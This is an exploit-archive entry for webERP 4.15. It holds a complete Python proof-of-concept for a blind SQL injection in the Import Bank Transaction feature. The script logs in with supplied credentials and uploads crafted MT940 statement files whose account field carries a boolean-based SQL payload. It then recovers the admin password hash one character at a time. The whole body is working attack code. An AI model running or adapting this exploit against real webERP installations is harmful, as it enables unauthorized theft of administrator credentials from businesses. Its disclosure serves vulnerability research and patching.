webERP 4.15 - 'ImportBankTransaction' Blind SQL Injection

2019-02-20
ID: 101060
CVE: None
Download vulnerable application: None
#!/usr/bin/env python3

"""
#
#
# Exploit Title:  webERP v4.15 ImportBankTransaction Blind SQL Injection
# Google Dork: N/A
# Date: 2019-02-20
# Exploit Author: Amine Mehdaoui
# Vendor Homepage: https://www.weberp.com
# Software Link: https://sourceforge.net/projects/web-erp/
# Version: 4.15
# Tested on: Ubuntu 18.04.1
# CVE: CVE-2019-7755
#
#
#
# Description:
# The Import Bank Transaction function fails to sanitize the content of imported MT940 
# bank statement files, resulting in the execution of arbitrary SQL queries.
#
#
#
# Attack Vector:
# An authenticated user with access to the Import Bank Transaction function 
# (to which access is granted by default to security roles such as 'accountant' and 'AR clerk')
# can leverage a specially crafted MT940 file to trigger a SQL injection flaw.
#
#
#
# Notes:
# 1. PoC was written to retrieve admin account CRYPT-BLOWFISH password hash. 
# 2. Successful exploitation requires access to the Import Bank Transaction function.
#
#
#
#
#
"""
from requests import session
from bs4 import BeautifulSoup
import sys, argparse



url = ''
csrftk = ''



def login(user, password):
    global csrftk
    
    s = session()
    csrftk = BeautifulSoup(s.get(url).text, 'html.parser').find('input', attrs = {'name':'FormID'})['value']
    login_data = {
                'UserNameEntryField'    :      user,
                'CompanyNameField'      :         0,
                'SubmitUser'            :   'Login',    
                'Password'              :  password,
                'FormID'                :    csrftk
    } 
    if 'Main Menu' in BeautifulSoup(s.post(url, login_data).text, 'html.parser').title.string:
        return s
    return None




def exploit(session):
    
    admin_hash = ''
    for i in range(61)[1:]:
        for c in [x for x in range(32, 127) if x!=39]:
            payload = "123' AND (SELECT CASE WHEN %d=ASCII(substring((SELECT password FROM www_users WHERE userid='admin'), %d, 1)) THEN '1' ELSE '2' END)='1"%(c,i)
            mt940_stmt_file = {'ImportFile' : ('mt940.txt', ':20:1\n:25:%s\n:28C:160/2019/PWN\n:60F:1111111USD111111111111,11' %payload)}
            data = {
        
                    'ImportFormat'  :   'MT940-ING',
                    'Import'        :   'Process',
                    'FormID'        :    csrftk
            }
            resp = session.post('%sImportBankTrans.php' %url, data = data, files = mt940_stmt_file)
            if not 'WARNING' in resp.text:
                break
        admin_hash+=chr(c)
    print('[+] admin hash : %s' %admin_hash)




if __name__ == "__main__":

    parser = argparse.ArgumentParser(description='webERP v4.15 ImportBankTransaction Blind SQL Injection Exploit')
    parser.add_argument('url', help='URL of webERP installation directory')
    parser.add_argument('user', help='Account username')
    parser.add_argument('password', help='Account password')
    args = parser.parse_args()   
    url = args.url.rstrip('/') + '/'
    session = login(args.user, args.password)  
    if not session:
        print('[-] Failed to login to webERP')
        sys.exit(1)
    exploit(session)
1-4-2 (www01)